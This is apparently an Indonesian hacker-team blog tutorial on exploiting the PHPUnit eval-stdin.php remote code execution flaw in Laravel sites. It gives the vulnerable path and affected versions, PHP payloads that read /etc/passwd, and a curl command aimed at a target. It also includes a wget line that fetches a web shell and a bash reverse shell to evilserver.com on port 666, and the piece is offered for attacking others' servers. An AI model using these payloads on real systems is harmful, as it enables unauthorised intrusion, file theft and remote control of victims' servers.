Oke Gayn Berjumpa Dengan Gue KENZO_ID, Kali Ini Gue Akan Share TUTORIAL LARAVEL PHPUNIT REMOTE CODE EXECUTION
https://rajaview.id/nIBkGRqtTiA7tdAvkAWk8p34GW88qUJG75qkrJhx
Oke Langsung Aja Ya.....
Laravel PHPUnit Remote Code Execution. Sebenarnya Ini Bug Udah Lama Banget. Tapi Jujur Aja Gue Juga Gk Tau Karena Emang Udah Jarang Banget Update Masalah Exploit. Nah Karena Exploit Ini Kembali Rame, Akhirnya Gue Coba Share Aja Deh Di Blog Barangkali Ada Yang Belum Tau. Celah Ini Sebenarnya Terletak Pada Vendor Third Party Yakni PHPUnit, Bukan Dari Laravelnya.
- Vuln: eval-stdin.php
- Full Path Exploit : http://target/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
- Affected versions : Before 4.8.28 and 5.x before 5.6.3
Disini Kalian Bebas Untuk Mengirim Datanya Menggunakan Burp Suite, Postman, Atau Curl Pun Bisa. Disini Gue Share Yang Pake Curl Dulu Karena Menurut Gue Ini Yang Paling Simple.
Gunakan Parameter -d Atau –data Untuk Nengirim Payloadnya. Payload Yang Bisa Digunakan:
<?php system('tail /etc/passwd'); ?>
<?php echo php_uname(); ?>
<?php show_source('/etc/passwd'); ?>
Contoh Command
curl -d "<?php echo php_uname(); ?>" http://webtarget/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Kalau Ingin Spawn Shell Ya Tinggal Diubah Payloadnya Menjadi Wget Misalnya
<?php system('wget https://raw.githubusercontent.com/linuxsec/indoxploit-shell/master/shell-v3.php'; ?>
Atau Diubah Ke Perintah Untuk Backconnect
<?php system('bash -i >& /dev/tcp/evilserver.com/666 0>&1');?>
Lalu Di Evil Server Dilisten Ke Port 666.
Atau, Kalian Bisa Menggunakan Burpsuite.
Intercept, Lalu Kirim Requestnya Ke Repeater.
Lalu Klik Menu Repeater, Masukkan Payloadnya Dibawah, Dan Klik Tombol Go.
Untuk Responnya Bisa Dilihat Di Sebelah Kolom Request (Sebelah Kanan).
Oke Mungkin Itu Aja Tutorial Kali Ini, Sekian Dan Semoga Bermanfaat.
Salam UMC.KENZO_ID 403
My Team (403 Forbidden Team)